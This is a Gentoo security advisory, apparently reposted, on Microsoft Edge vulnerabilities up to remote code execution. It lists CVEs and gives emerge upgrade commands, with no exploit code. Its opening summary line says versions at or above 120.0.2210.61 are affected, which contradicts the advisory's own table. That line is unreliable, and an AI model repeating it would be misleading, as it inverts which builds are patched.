Gentoo Linux Security Advisory 202402-5 - Multiple vulnerabilities have been discovered in Microsoft Edge, the worst of which could lead to remote code execution. Versions greater than or equal to 120.0.2210.61 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Microsoft Edge: Multiple Vulnerabilities  
     Date: February 03, 2024  
     Bugs: #907817, #908518, #918586, #919495  
       ID: 202402-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Microsoft Edge, the  
worst of which could lead to remote code execution.

Background  
==========

Microsoft Edge is a browser that combines a minimal design with  
sophisticated technology to make the web faster, safer, and easier.

Affected packages  
=================

Package                    Vulnerable       Unaffected  
-------------------------  ---------------  ----------------  
www-client/microsoft-edge  < 120.0.2210.61  >= 120.0.2210.61

Description  
===========

Multiple vulnerabilities have been discovered in Microsoft Edge. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Microsoft Edge users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/microsoft-edge-120.0.2210.61"

References  
==========

[ 1 ] CVE-2023-29345  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29345  
[ 2 ] CVE-2023-33143  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33143  
[ 3 ] CVE-2023-33145  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33145  
[ 4 ] CVE-2023-35618  
      https://nvd.nist.gov/vuln/detail/CVE-2023-35618  
[ 5 ] CVE-2023-36022  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36022  
[ 6 ] CVE-2023-36029  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36029  
[ 7 ] CVE-2023-36034  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36034  
[ 8 ] CVE-2023-36409  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36409  
[ 9 ] CVE-2023-36559  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36559  
[ 10 ] CVE-2023-36562  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36562  
[ 11 ] CVE-2023-36727  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36727  
[ 12 ] CVE-2023-36735  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36735  
[ 13 ] CVE-2023-36741  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36741  
[ 14 ] CVE-2023-36787  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36787  
[ 15 ] CVE-2023-36880  
      https://nvd.nist.gov/vuln/detail/CVE-2023-36880  
[ 16 ] CVE-2023-38174  
      https://nvd.nist.gov/vuln/detail/CVE-2023-38174

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-05

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#linux